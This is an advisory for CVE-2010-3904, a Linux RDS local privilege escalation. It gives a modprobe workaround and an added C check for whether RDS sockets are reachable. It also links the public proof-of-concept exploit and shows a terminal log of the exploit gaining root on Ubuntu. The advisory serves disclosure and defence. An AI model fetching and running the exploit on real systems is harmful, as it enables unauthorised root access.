10.21
—————–
Advisory Name: Linux RDS Protocol Local Privilege Escalation
Release Date: 2010-10-19
Application: Linux Kernel
Versions: 2.6.30 – 2.6.36-rc8
Severity: High
Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com >
Vendor Status: Patch Released
CVE Candidate: CVE-2010-3904
—————–
Recommendation:
Users should install updates provided by downstream distributions or apply the committed patch and recompile their kernel.
Preventing the RDS kernel module from loading is an effective workaround, because the vulnerable code is only reachable once an RDS socket can be created. This can be accomplished by executing the following command as root (the file name needs a .conf suffix on systems whose modprobe ignores other files in /etc/modprobe.d):
echo "alias net-pf-21 off" > /etc/modprobe.d/disable-rds.conf
The alias only stops future automatic loading. If the rds module is already loaded (check with lsmod), unload it with rmmod or reboot after adding the alias.
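Verifying the workaround (added check program, not part of this advisory and not vsecurity's exploit): the program below attempts socket(PF_RDS, SOCK_SEQPACKET, 0) as an unprivileged user. PF_RDS is protocol family 21, which is what the net-pf-21 alias above disables, so with the alias in place and the module not already loaded the call must fail with EAFNOSUPPORT. A successful socket() means the kernel still exposes RDS and therefore the vulnerable path. The function and message names are my own choices.

```c
/* Added example: probe whether an unprivileged process can obtain an RDS
 * socket, the precondition for CVE-2010-3904. Not part of the advisory or
 * of the vsecurity proof-of-concept. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef PF_RDS
#define PF_RDS 21      /* same family number as the net-pf-21 modprobe alias */
#endif

/* Try to create an RDS socket (RDS only supports SOCK_SEQPACKET).
 * Returns 1 if the kernel handed one out (closed again immediately),
 * 0 otherwise; *err receives errno on failure, 0 on success. */
int rds_probe(int *err)
{
    int fd = socket(PF_RDS, SOCK_SEQPACKET, 0);
    if (fd < 0) {
        if (err) *err = errno;
        return 0;
    }
    close(fd);
    if (err) *err = 0;
    return 1;
}

/* Translate the probe result into a verdict on the workaround. A missing
 * family yields EAFNOSUPPORT once module autoloading is refused; the other
 * two errnos cover a kernel that knows the family but refuses the type/proto. */
const char *rds_verdict(int available, int err)
{
    if (available)
        return "RDS socket created: module loaded or auto-loadable, workaround NOT in effect";
    if (err == EAFNOSUPPORT || err == EPROTONOSUPPORT || err == ESOCKTNOSUPPORT)
        return "RDS unavailable: module disabled, workaround in effect";
    return "socket() failed for another reason (e.g. sandbox policy): inconclusive";
}

int main(void)
{
    int err = 0;
    int available = rds_probe(&err);
    printf("%s", rds_verdict(available, err));
    if (!available)
        printf(" (errno %d: %s)", err, strerror(err));
    printf("\n");
    /* Exit non-zero when RDS is reachable so the check can gate a deployment. */
    return available ? 1 : 0;
}
```

Run it as a normal user, not root: the exploit path is interesting precisely because an unprivileged caller can create the socket. A non-zero exit status means the kernel is still exposing RDS.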
Proof-of-Concept Exploit:
http://www.vsecurity.com/download/tools/linux-rds-exploit.c
Testing:
b0t@snow:/tmp$ gcc -o rds linux-rds-exploit.c
b0t@snow:/tmp$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xffffffffa0aab8c0
[+] Resolved rds_ioctl to 0xffffffffa0aa4000
[+] Resolved commit_creds to 0xffffffff810863b0
[+] Resolved prepare_kernel_cred to 0xffffffff81086880
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[*] Got root!
# uname -a
Linux snow 2.6.35-22-generic #34-Ubuntu SMP Sun Oct 10 09:26:05 UTC 2010 x86_64 GNU/Linux
# id
uid=0(root) gid=0(root) groups=0(root)
#